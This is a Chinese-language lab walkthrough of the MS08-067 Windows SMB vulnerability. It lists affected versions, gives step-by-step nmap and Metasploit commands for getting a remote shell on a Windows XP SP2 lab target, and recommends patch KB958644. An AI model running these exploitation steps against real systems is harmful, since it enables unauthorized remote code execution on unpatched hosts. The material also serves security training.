目录
1【漏洞说明】
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。
2 【漏洞等级】
高危
3 【影响版本】
Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 1
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 SP1
Windows Server 2003 SP2
Windows Vista 和 Windows Vista Service Pack 1
Windows Vista x64 Edition 和 Windows Vista x64 Edition Service Pack 1
Windows Server 2008(用于 32 位系统)
Windows Server 2008(用于基于 x64 的系统)
Windows Server 2008(用于基于 Itanium 的系统)
Windows 7 Beta(用于 32 位系统)
Windows 7 Beta x64 Edition
Windows 7 Beta(用于基于 Itanium 的系统)
4 【漏洞危害】
攻击服务器SMB服务(445),造成远程代码执行,获取主机系统权限
5 【运行环境】
攻击机:kali
靶机:windows-xp_SP2
6 【利用过程】
6.1靶机前期准备
(1)关闭防火墙
添加图片注释,不超过 140 字(可选)
(2)确认SMB服务开启
netstat -ano | findstr 445
net share
添加图片注释,不超过 140 字(可选)
6.2网络测试
ping 192.168.0.2
添加图片注释,不超过 140 字(可选)
6.3端口探测
nmap -sV 192.168.0.2 -p 445
添加图片注释,不超过 140 字(可选)
6.4打开msf
msfconsole
添加图片注释,不超过 140 字(可选)
6.5搜索漏洞MS08-067
search ms08-067
添加图片注释,不超过 140 字(可选)
6.6使用ms08-067漏洞
use 0
show options
添加图片注释,不超过 140 字(可选)
6.7必要参数配置
l set rhosts 192.168.0.2 //设置靶机ip
l set rport 445 //攻击端口
l set lhost 192.168.0.4 //设置本地ip
l set lport 4444 //设置本地监听端口
l set target 10 //选择靶机对应的系统
添加图片注释,不超过 140 字(可选)
添加图片注释,不超过 140 字(可选)
注意:根据目标靶机的系统选择target,自动选择可能导致攻击利用不成功。目标靶机是windows-xp_sp2,选择 target 10
6.8进行攻击,成功获取靶机shell
exploit
添加图片注释,不超过 140 字(可选)
7【修复建议】
打补丁包KB958644